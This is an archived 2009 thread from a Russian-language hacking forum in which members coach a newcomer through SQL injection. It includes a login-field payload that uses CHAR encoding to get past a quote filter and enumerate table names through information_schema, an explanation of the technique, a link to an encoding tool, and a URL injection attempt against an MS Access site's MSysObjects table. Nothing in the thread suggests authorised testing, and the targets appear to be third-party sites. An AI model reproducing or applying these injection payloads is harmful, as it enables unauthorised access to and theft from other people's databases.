ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.01.2009, 18:34
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Gemini12, создай у себя HTML файл с тем содержимым что я тебе написал...
|
|
|
23.01.2009, 18:57
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
Все! Понял! Благодарю!
|
|
|
|
23.01.2009, 19:02
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
Сообщение от groundhog
Gemini12, чтобы обойти фильтр кавычек, в поле Логин вставляй преобразованные символьные строки:
' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name!=char(115)+char(104)+char(95)+char(99)+ char(117)+char(115)+char(116)+char(111)+char(109)+ char(101)+char(114)+char(115))--
А что зашифровал?
|
|
|
|
23.01.2009, 19:05
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Ну ты же таблицы перебираешь? Выбрал таблицу с именем 'test' значит на следующий раз тебе нужно её отбросить, вот ты её таким образом шифруешь и пишешь в условии WHERE ... ... ... ... AND table_name!=CHAR(...)+CHAR(...)+CHAR(...)+CHAR(... ). Где в CHAR отдельные ASCII коды букв - t, e, s и t.
|
|
|
|
23.01.2009, 19:20
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 Gemini12:
на, не парься http://slil.ru/26575601
readme в комплекте, шифруй только имена таблиц, кавычки не шифруй
|
|
|
|
23.01.2009, 19:39
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
Сообщение от Pashkela
2 Gemini12:
на, не парься http://slil.ru/26575601
readme в комплекте, шифруй только имена таблиц, кавычки не шифруй
пароль помнишь?
|
|
|
|
23.01.2009, 19:48
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
Подскажите по Microsoft Database:
пишу
http://site.ru/index.php?newsid=1+or+1=(SELECT+TOP+1+TABLE_NAME+F ROM+MSysObjects)
выдает
Record(s) cannot be read; no read permission on 'MSysObjects'.
что можно сделать? |
|
|
|
23.01.2009, 19:54
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
MSysObjects - системная табла. К ней довольно часто закрыт доступ.
|
|
|
|
23.01.2009, 19:54
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Разочароваться можно (как вариант).
З.Ы. Прав нету у тебя читать оттуда.
|
|
|
|
23.01.2009, 19:57
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
Сообщение от R1dex
MSysObjects - системная табла. К ней довольно часто закрыт доступ.
Это я уже понял 
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
